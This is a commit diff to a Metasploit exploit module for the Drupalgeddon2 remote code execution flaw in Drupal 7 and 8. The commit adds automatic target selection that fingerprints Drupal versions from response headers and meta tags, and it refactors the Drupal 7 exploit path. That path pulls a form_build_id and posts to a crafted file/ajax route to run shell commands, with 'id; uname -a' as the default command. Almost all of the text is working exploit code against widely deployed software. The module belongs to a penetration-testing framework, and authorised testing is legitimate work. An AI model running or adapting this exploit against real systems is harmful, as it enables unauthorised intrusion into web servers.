Add version detection and automatic targeting

I also refactored error handling. Should be cleaner now.
2018-04-18 21:40:22 -05:00 · 2018-04-18 21:40:22 -05:00 · 3d116d721d
parent 86ffbc753e
commit 3d116d721d
1 changed files with 52 additions and 14 deletions
--- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@ -44,6 +44,14 @@ class MetasploitModule < Msf::Exploit::Remote
      'Privileged'     => false,
      # XXX: Using "x" in Gem::Version::new isn't technically appropriate
      'Targets'        => [
+        ['Automatic (Unix In-Memory)',
+         'Platform'    => 'unix',
+         'Arch'        => ARCH_CMD
+        ],
+        ['Automatic (Linux Dropper)',
+         'Platform'    => 'linux',
+         'Arch'        => [ARCH_X86, ARCH_X64]
+        ],
        ['Drupal 7.x (Unix In-Memory)',
         'Platform'    => 'unix',
         'Arch'        => ARCH_CMD,
@ -65,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Version'     => Gem::Version.new('8.x')
        ]
      ],
-      'DefaultTarget'  => 2, # Drupal 8.x (Unix In-Memory)
+      'DefaultTarget'  => 0, # Automatic (Unix In-Memory)
      'DefaultOptions' => {
        'PAYLOAD'      => 'cmd/unix/generic',
        'CMD'          => 'id; uname -a'
@ -113,6 +121,15 @@ class MetasploitModule < Msf::Exploit::Remote
    vprint_status("Executing with #{func}(): #{cmd}")

    res = case target['Version'].to_s
+    when '' # Automatic
+      case detect_version.to_s
+      when '7.x'
+        print_good('Drupal 7 detected')
+        exploit_drupal7(func, cmd)
+      when '8.x'
+        print_good('Drupal 8 detected')
+        exploit_drupal8(func, cmd)
+      end
    when '7.x'
      exploit_drupal7(func, cmd)
    when '8.x'
@ -120,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
    end

    unless res && res.code == 200
-      vprint_error("Unexpected final reply: #{res.inspect}")
+      print_error("Unexpected reply: #{res.inspect}")
      return
    end

@ -129,6 +146,35 @@ class MetasploitModule < Msf::Exploit::Remote
    res
  end

+  def detect_version
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => target_uri.path
+    )
+
+    return res unless res && res.code == 200
+
+    case res.headers['X-Generator']
+    when /Drupal 7/
+      return Gem::Version.new('7.x')
+    when /Drupal 8/
+      return Gem::Version.new('8.x')
+    end
+
+    generator = res.get_html_document.at(
+      '//meta[@name = "Generator"]/@content'
+    )
+
+    return res unless generator
+
+    case generator.value
+    when /Drupal 7/
+      Gem::Version.new('7.x')
+    when /Drupal 8/
+      Gem::Version.new('8.x')
+    end
+  end
+
  def exploit_drupal7(func, code)
    vars_get = {
      'q'                    => 'user/password',
@ -149,28 +195,20 @@ class MetasploitModule < Msf::Exploit::Remote
      'vars_post' => vars_post
    )

-    unless res && res.code == 200
-      vprint_error("Unexpected intermediate reply: #{res.inspect}")
-      return
-    end
+    return res unless res && res.code == 200

    form_build_id = res.get_html_document.at(
      '//input[@name = "form_build_id"]/@value'
    )

-    if form_build_id
-      form_build_id = form_build_id.value
-    else
-      vprint_error("Unknown form_build_id: #{res.inspect}")
-      return
-    end
+    return res unless form_build_id

    vars_get = {
-      'q' => "file/ajax/name/#value/#{form_build_id}"
+      'q' => "file/ajax/name/#value/#{form_build_id.value}"
    }

    vars_post = {
-      'form_build_id' => form_build_id
+      'form_build_id' => form_build_id.value
    }

    send_request_cgi(